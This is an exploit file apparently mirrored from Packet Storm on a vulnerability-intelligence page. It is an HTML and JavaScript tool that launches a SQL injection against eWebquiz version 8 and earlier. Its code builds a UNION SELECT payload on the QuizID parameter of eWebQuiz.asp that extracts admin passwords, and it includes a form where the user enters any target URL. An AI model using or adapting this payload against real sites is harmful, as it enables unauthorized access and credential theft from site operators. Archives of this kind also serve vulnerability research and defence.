Lucene search

ewebquiz8-sql.txt

🗓️ 24 Mar 2007 00:00:00Reported by ajannType

packetstorm🔗 packetstormsecurity.com👁 26 Views

eWebquiz <= V.8 Remote SQL Injection Exploi

`<html>  
<head>  
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">  
<title>eWebquiz <= V.8 (eWebQuiz.asp) Remote SQL Injection Exploit</title>  
  
<script language="JavaScript">  
  
//'===============================================================================================  
//'[Script Name: eWebquiz <= V.8 (eWebQuiz.asp) Remote SQL Injection Exploit  
//'[Coded by : ajann  
//'[Author : ajann  
//'[Contact : :(  
//'[S.Page : http://www.activewebsoftwares.com  
//'[$$ : $ 599.00  
//'[Using : Write Target after Submit Click  
//'===============================================================================================  
  
//# ajann,Turkey  
//# ...  
  
  
  
//Basic exploit,but any time : (   
var path="/"  
var adres="/eWebQuiz.asp?" //File name  
var acik ="QuizID=" // Line x  
var sql = "-1%20union%20select%201,2,3,4,5,6,7,1,2,3,4,5,6,7,8,9,1,2,3,4,5,1,2,3,111,password,0,1%20from%20admins"  
  
function command(){  
if (document.rfi.target1.value==""){  
alert("Failed..");  
return false;  
}  
  
  
  
rfi.action= document.rfi.target1.value+path+adres+acik+sql; // Ready Target : )  
rfi.submit(); // Form Submit  
}  
</script>  
  
</head>  
  
<body bgcolor="#000000">  
<center>  
  
<p><b><font face="Verdana" size="2" color="#008000">eWebquiz <= V.8 (eWebQuiz.asp) Remote SQL Injection Exploit</font></b></p>  
  
<p></p>  
<form method="post" target="getting" name="rfi" onSubmit="command();">  
<b><font face="Arial" size="1" color="#FF0000">Target:</font><font face="Arial" size="1" color="#808080">[http://[target]/[scriptpath]</font><font color="#00FF00" size="2" face="Arial">  
</font><font color="#FF0000" size="2">&nbsp;</font></b>  
<input type="text" name="target1" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';"></p>  
<p><input type="submit" value="Gonder" name="B1"><input type="reset" value="Sifirla" name="B2"></p>  
</form>  
<p><br>  
<iframe name="getting" height="337" width="633" scrolling="yes" frameborder="0"></iframe>  
</p>  
  
<b><font face="Verdana" size="2" color="#008000">ajann</font></b></p>  
</center>  
</body>  
  
</html>  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

24 Mar 2007 00:00Current

7.4High risk

Vulners AI Score7.4